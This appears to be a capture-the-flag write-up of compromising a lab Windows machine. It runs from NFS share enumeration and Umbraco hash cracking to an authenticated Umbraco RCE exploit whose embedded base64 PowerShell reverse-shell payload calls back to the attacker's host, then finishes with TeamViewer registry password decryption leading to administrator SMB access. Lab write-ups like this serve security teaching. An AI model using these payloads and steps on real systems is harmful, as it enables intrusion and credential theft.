Enumeration
Run Nmap Scan
nmap -p- -T4 10.129.229.68
"
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-10 15:00 BST
Nmap scan report for 10.129.229.68
Host is up (0.18s latency).
Not shown: 65519 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49678/tcp open unknown
49679/tcp open unknown
49680/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 634.70 seconds
"
Tip: cat nmap | grep 'open' | cut -d / -f 1 | tr '\n' ',’ to get all the ports
nmap -p 21,80,111,135,139,445,2049,5985,47001,49664,49665,49666,49667,49678,49679,49680 -sC -sV 10.129.229.68
"
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-10 15:12 BST
Nmap scan report for 10.129.229.68
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -2s
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-10-10T14:13:26
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.44 seconds
"
View Website
Index

/People

/Umbraco

Directory Bruteforcing (Run Gobuster)
gobuster dir -u http://10.129.229.68/ -w /usr/share/wordlists/dirb/common.txt
"
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.229.68/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/10/10 15:15:17 Starting gobuster in directory enumeration mode
===============================================================
[ERROR] 2023/10/10 15:15:34 [!] Get "http://10.129.229.68/about-us": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/Blog (Status: 200) [Size: 5001]
/blog (Status: 200) [Size: 5001]
/contact (Status: 200) [Size: 7880]
/Contact (Status: 200) [Size: 7880]
/home (Status: 200) [Size: 6703]
/Home (Status: 200) [Size: 6703]
/install (Status: 302) [Size: 126] [--> /umbraco/]
/intranet (Status: 200) [Size: 3323]
/master (Status: 500) [Size: 3420]
/people (Status: 200) [Size: 6739]
/People (Status: 200) [Size: 6739]
/person (Status: 200) [Size: 2741]
/product (Status: 500) [Size: 3420]
/products (Status: 200) [Size: 5328]
/Products (Status: 200) [Size: 5328]
/umbraco (Status: 200) [Size: 4040]
===============================================================
2023/10/10 15:17:08 Finished
===============================================================
"
Enumerating FTP (Failed)
ftp 10.129.229.68
"
Connected to 10.129.229.68.
220 Microsoft FTP Service
Name (10.129.229.68:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
"
List directories and files
ftp> ls
"
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>
"
Check if file upload is permitted
ftp> put hello.sh
"
local: hello.sh remote: hello.sh
200 PORT command successful.
550 Access is denied.
ftp>
"
Enumerating SMB (Failed)
smbmap -H 10.129.229.68
"
[!] Authentication error on 10.129.229.68
"
Enumerating NFS
Show which folder is available
showmount -e 10.129.229.68
"
Export list for 10.129.229.68:
/site_backups (everyone)
"
showmount , and there was a folder called /site_backups
Mounting the Folder
mkdir /tmp/nfs
sudo mount -t nfs -o vers=2 10.129.229.68:/site_backups /tmp/nfs -o nolock
/site_backups to our local folder called /tmp/nfs.
Viewing the Folder
# /tmp/nfs
ls
"
App_Browsers aspnet_client css Media Umbraco_Client
App_Data bin default.aspx scripts Views
App_Plugins Config Global.asax Umbraco Web.config
"
cd into the /tmp/nfs which is mounted to /site_backups. Since it is only allowed to be viewed by the file owner, I changed my user account to root to view it.
Exploitation
Finding Credentials
Finding credentials from Web.config
cat Web.config | grep 'connectionString'
`
<connectionStrings>
<add name="umbracoDbDSN" connectionString="Data Source=|DataDirectory|\Umbraco.sdf;Flush Interval=1;" providerName="System.Data.SqlServerCe.4.0" />
</connectionStrings>
<add name="DefaultSessionProvider" type="System.Web.Providers.DefaultSessionStateProvider, System.Web.Providers, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" />
`
Web.config is a config file used for IIS. It contains a credential which can be extract by the command cat Web.config | grep 'conntectionString. Here you can see that the credential is referenced through the file called Umbraco.sdf
Searching Umbraco.sdf
find /tmp/nfs -name Umbraco.sdf
"
/tmp/nfs/App_Data/Umbraco.sdf
"
Searching for Strings in Umbraco.sdf
strings Umbraco.sdf
`
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
@{pv
qpkaj
dAc0^A\pW
(1&a$
"q!Q
umbracoDomains
domainDefaultLanguage
umbracoDomains
domainRootStructureID
umbracoDomains
domainName
umbracoDomains
`
Umbraco.sdf was a binary file which contains our credential. Since I just wanted the credentials, I used strings .
Cracking the Hash
CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc. I used crackstation to decrypt the hash.
username: admin
password: baconandcheese
Accessing Services with the obtained Credentials
FTP (Failed)
ftp 10.129.229.68
"
Connected to 10.129.229.68.
220 Microsoft FTP Service
Name (10.129.229.68:root): admin
331 Password required
Password:
530 User cannot log in.
Login failed.
Remote system type is Windows_NT.
ftp>
ftp> open 10.129.229.68
Connected to 10.129.229.68.
220 Microsoft FTP Service
Name (10.129.229.68:root): admin@htb.local
331 Password required
Password:
530 User cannot log in.
Login failed.
Remote system type is Windows_NT.
ftp>
"
SMB (Failed)
smbmap -H 10.129.229.68 -u admin -p baconandcheese
"
[!] Authentication error on 10.129.229.68
"
smbmap -H 10.129.229.68 -u admin@htb.local -p baconandcheese
"
[!] Authentication error on 10.129.229.68
"
/Umbraco

Exploiting Umbraco
Enumerating Service Information

? icon located at the bottom, the popup menu will appear at the left shown above. The version used is Umbraco 7.12.4
Searching for Exploit
searchsploit umbraco
"
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) | aspx/webapps/49488.py
Umbraco CMS 8.9.1 - Directory Traversal | aspx/webapps/50241.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting | php/webapps/44988.txt
Umbraco v8.14.1 - 'baseUrl' SSRF | aspx/webapps/50462.txt
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
"
searchsploit -x 49488
"
Exploit: Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution
URL: https://www.exploit-db.com/exploits/46153
Path: /usr/share/exploitdb/exploits/aspx/webapps/46153.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
"
aspx/webapps/49488.py. I tried the other exploit, but the exploit didn’t work. (aspx/webapps/46153.py)
Generating Reverse Shell
Online - Reverse Shell Generator Set your attack machine IP and Port

-e
proc.StartInfo.Arguments = "-e <base64 payload>"
-e inside the proc.StartInfo.Arguments
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = ""; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = "-e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANwA0ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==";\
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
</msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
</xsl:template> </xsl:stylesheet> ';
Configuring RHOST and Authentication Credentials
login = "admin@htb.local";
password="baconandcheese";
host = "http://10.129.229.68";
Listen to Reverse Shell and Exploit
python3 46153.py
"
Start
[]
"
nc -lvnp 4444
"
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.229.68.
Ncat: Connection from 10.129.229.68:49961.
whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv>
"
Privilege Escalation
Using Kernel Exploit (Failed)
Getting Systeminfo and Saving the file as systeminfo.txt
systeminfo
"
Host Name: REMOTE
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA801
Original Install Date: 2/19/2020, 4:03:29 PM
System Boot Time: 10/10/2023, 9:57:56 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: VMware, Inc. VMW71.00V.21100432.B64.2301110304, 1/11/2023
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 850 MB
Virtual Memory: Max Size: 2,431 MB
Virtual Memory: Available: 1,257 MB
Virtual Memory: In Use: 1,174 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 4 Hotfix(s) Installed.
[01]: KB4534119
[02]: KB4516115
[03]: KB4523204
[04]: KB4464455
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.229.68
[02]: fe80::87c:2426:d478:d5a5
[03]: dead:beef::87c:2426:d478:d5a5
[04]: dead:beef::11e
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
"
Install and execute wes-ng
pip3 install wesng
wes --update # Update the exploit
wes systeminfo.txt -o out.csv # Input the systeminfo file and output the available exploit in csv file
Search for Privilege Escalation Kernel Exploit
cat out.csv | grep 'Privilege' | grep 'exploit-db'
"
"
Enumerating Services
Searching for interesting services
tasklist
"
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 0 8 K
System 4 0 136 K
Registry 88 0 23,632 K
smss.exe 292 0 1,212 K
csrss.exe 380 0 5,292 K
wininit.exe 484 0 6,872 K
csrss.exe 492 1 4,752 K
winlogon.exe 548 1 17,568 K
services.exe 624 0 8,076 K
lsass.exe 640 0 14,652 K
svchost.exe 740 0 14,128 K
fontdrvhost.exe 768 1 4,164 K
fontdrvhost.exe 776 0 3,952 K
svchost.exe 852 0 10,188 K
dwm.exe 924 1 39,784 K
svchost.exe 968 0 60,844 K
svchost.exe 1012 0 17,616 K
svchost.exe 60 0 19,684 K
svchost.exe 280 0 15,968 K
vm3dservice.exe 1080 0 6,592 K
svchost.exe 1104 0 19,224 K
svchost.exe 1160 0 23,308 K
svchost.exe 1256 0 8,844 K
svchost.exe 1480 0 15,972 K
svchost.exe 1736 0 7,352 K
spoolsv.exe 1316 0 16,588 K
svchost.exe 1344 0 10,792 K
svchost.exe 1752 0 34,984 K
svchost.exe 2052 0 12,464 K
inetinfo.exe 2088 0 15,404 K
TeamViewer_Service.exe 2196 0 19,996 K
svchost.exe 2220 0 7,500 K
svchost.exe 2228 0 8,404 K
MsMpEng.exe 2260 0 110,692 K
vmtoolsd.exe 2268 0 18,956 K
VGAuthService.exe 2276 0 10,564 K
svchost.exe 2292 0 12,456 K
svchost.exe 2412 0 12,252 K
nfssvc.exe 2524 0 5,432 K
dllhost.exe 2796 0 13,516 K
WmiPrvSE.exe 3244 0 23,280 K
msdtc.exe 3432 0 10,308 K
LogonUI.exe 3960 1 47,492 K
SearchIndexer.exe 2328 0 20,408 K
svchost.exe 4516 0 12,856 K
svchost.exe 4992 0 7,540 K
w3wp.exe 840 0 359,320 K
nfssvc.exe 1456 0 112 K
powershell.exe 9068 0 71,396 K
conhost.exe 8244 0 12,280 K
cmd.exe 7992 0 4,828 K
powershell.exe 9368 0 73,392 K
conhost.exe 9348 0 12,336 K
winPEASany_ofs.exe 9720 0 70,564 K
powershell.exe 8380 0 70,008 K
conhost.exe 9864 0 12,260 K
tasklist.exe 7796 0 7,588 K
"
TeamViewer_Service.exe seems interesting!
Finding Credentials from TeamViewer Registry
reg query HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7
"
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7
StartMenuGroup REG_SZ TeamViewer 7
InstallationDate REG_SZ 2020-02-20
InstallationDirectory REG_SZ C:\Program Files (x86)\TeamViewer\Version7
Always_Online REG_DWORD 0x1
Security_ActivateDirectIn REG_DWORD 0x0
Version REG_SZ 7.0.43148
ClientIC REG_DWORD 0x11f25831
PK REG_BINARY BFAD2AEDB6C89AE0A0FD0501A0C5B9A5C0D957A4CC57C1884C84B6873EA03C069CF06195829821E28DFC2AAD372665339488DD1A8C85CDA8B19D0A5A2958D86476D82CA0F2128395673BA5A39F2B875B060D4D52BE75DB2B6C91EDB28E90DF7F2F3FBE6D95A07488AE934CC01DB8311176AEC7AC367AB4332ABD048DBFC2EF5E9ECC1333FC5F5B9E2A13D4F22E90EE509E5D7AF4935B8538BE4A606AB06FE8CC657930A24A71D1E30AE2188E0E0214C8F58CD2D5B43A52549F0730376DD3AE1DB66D1E0EBB0CF1CB0AA7F133148D1B5459C95A24DDEE43A76623759017F21A1BC8AFCD1F56FD0CABB340C9B99EE3828577371B7ADA9A8F967A32ADF6CF062B00026C66F8061D5CFF89A53EAE510620BC822BC6CC615D4DE093BC0CA8F5785131B75010EE5F9B6C228E650CA89697D07E51DBA40BF6FC3B2F2E30BF6F1C01F1BC2386FA226FFFA2BE25AE33FA16A2699A1124D9133F18B50F4DB6EDA2D23C2B949D6D2995229BC03507A62FCDAD55741B29084BD9B176CFAEDAAA9D48CBAF2C192A0875EC748478E51156CCDD143152125AE7D05177083F406703ED44DCACCD48400DD88A568520930BED69FCD672B15CD3646F8621BBC35391EAADBEDD04758EE8FC887BACE6D8B59F61A5783D884DBE362E2AC6EAC0671B6B5116345043257C537D27A8346530F8B7F5E0EBACE9B840E716197D4A0C3D68CFD2126E8245B01E62B4CE597AA3E2074C8AB1A4583B04DBB13F13EB54E64B850742A8E3E8C2FAC0B9B0CF28D71DD41F67C773A19D7B1A2D0A257A4D42FC6214AB870710D5E841CBAFCD05EF13B372F36BF7601F55D98ED054ED0F321AEBA5F91D390FF0E8E5815E6272BA4ABB3C85CF4A8B07851903F73317C0BC77FA12A194BB75999319222516
SK REG_BINARY F82398387864348BAD0DBB41812782B1C0ABB9DAEEF15BC5C3609B2C5652BED7A9A07EA41B3E7CB583A107D39AFFF5E06DF1A06649C07DF4F65BD89DE84289D0F2CBF6B8E92E7B2901782BE8A039F2903552C98437E47E16F75F99C07750AEED8CFC7CD859AE94EC6233B662526D977FFB95DD5EB32D88A4B8B90EC1F8D118A7C6D28F6B5691EB4F9F6E07B6FE306292377ACE83B14BF815C186B7B74FFF9469CA712C13F221460AC6F3A7C5A89FD7C79FF306CEEBEF6DE06D6301D5FD9AB797D08862B9B7D75B38FB34EF82C77C8ADC378B65D9ED77B42C1F4CB1B11E7E7FB2D78180F40C96C1328970DA0E90CDEF3D4B79E08430E546228C000996D846A8489F61FE07B9A71E7FB3C3F811BB68FDDF829A7C0535BA130F04D9C7C09B621F4F48CD85EA97EF3D79A88257D0283BF2B78C5B3D4BBA4307D2F38D3A4D56A2706EDAB80A7CE20E21099E27481C847B49F8E91E53F83356323DDB09E97F45C6D103CF04693106F63AD8A58C004FC69EF8C506C553149D038191781E539A9E4E830579BCB4AD551385D1C9E4126569DD96AE6F97A81420919EE15CF125C1216C71A2263D1BE468E4B07418DE874F9E801DA2054AD64BE1947BE9580D7F0E3C138EE554A9749C4D0B3725904A95AEBD9DACCB6E0C568BFA25EE5649C31551F268B1F2EC039173B7912D6D58AA47D01D9E1B95E3427836A14F71F26E350B908889A95120195CC4FD68E7140AA8BB20E211D15C0963110878AAB530590EE68BF68B42D8EEEB2AE3B8DEC0558032CFE22D692FF5937E1A02C1250D507BDE0F51A546FE98FCED1E7F9DBA3281F1A298D66359C7571D29B24D1456C8074BA570D4D0BA2C3696A8A9547125FFD10FBF662E597A014E0772948F6C5F9F7D0179656EAC2F0C7F
LastMACUsed REG_MULTI_SZ \000505696076C
MIDInitiativeGUID REG_SZ {514ed376-a4ee-4507-a28b-484604ed0ba0}
MIDVersion REG_DWORD 0x1
ClientID REG_DWORD 0x6972e4aa
CUse REG_DWORD 0x1
LastUpdateCheck REG_DWORD 0x64c273d8
UsageEnvironmentBackup REG_DWORD 0x1
SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
MultiPwdMgmtIDs REG_MULTI_SZ admin
MultiPwdMgmtPWDs REG_MULTI_SZ 357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77
Security_PasswordStrength REG_DWORD 0x3
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7\AccessControl
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7\DefaultSettings
"
SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B is what we were finding!
Cracking TeamViewer Credentials
https://gist.github.com/rishdang/442d355180e5c69e0fcb73fecd05d7e0python teamviewer_password_decrypt.py
`
This is a quick and dirty Teamviewer password decrypter basis wonderful post by @whynotsecurity.
Read this blogpost if you haven't already : https://whynotsecurity.com/blog/teamviewer
Please check below mentioned registry values and enter its value manually without spaces.
"SecurityPasswordAES" OR "OptionsPasswordAES" OR "SecurityPasswordExported" OR "PermanentPassword"
Enter output from registry without spaces : FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
Decrypted password is : !R3m0te!
`
Accessing SMB using Admin Credentials
smbmap -H 10.129.229.68 -u administrator -p '!R3m0te!'
"
[+] IP: 10.129.229.68:445 Name: 10.129.229.68
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ READ ONLY Remote IPC
"
smbclient //10.129.229.68/C$ -U administrator --password '!R3m0te!'
`
Try "help" to get a list of possible commands.
smb: \> ls
$Recycle.Bin DHS 0 Wed Feb 19 20:04:06 2020
._nfs DHS 0 Tue Oct 10 15:43:27 2023
Config.Msi DHS 0 Fri Jul 9 12:41:30 2021
Documents and Settings DHSrn 0 Wed Feb 19 20:03:20 2020
ftp_transfer D 0 Thu Feb 20 06:13:36 2020
inetpub D 0 Wed Feb 19 20:11:33 2020
Microsoft D 0 Thu Feb 20 04:09:44 2020
pagefile.sys AHS 402653184 Tue Oct 10 14:58:06 2023
PerfLogs D 0 Sat Sep 15 08:19:00 2018
Program Files DR 0 Fri Jul 9 12:41:04 2021
Program Files (x86) D 0 Sun Feb 23 19:19:45 2020
ProgramData DH 0 Wed Feb 19 21:16:04 2020
Recovery DHSn 0 Wed Feb 19 20:03:20 2020
site_backups D 0 Sun Feb 23 18:35:48 2020
System Volume Information DHS 0 Thu Feb 20 06:43:40 2020
temp D 0 Wed Oct 11 15:40:51 2023
Users DR 0 Wed Feb 19 20:12:25 2020
Windows D 0 Wed Oct 11 16:20:39 2023
6206975 blocks of size 4096. 3246583 blocks available
smb: \> cd Users
smb: \Users\> cd Administrator
smb: \Users\Administrator\> cd Desktop
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \Users\Administrator\Desktop\>
`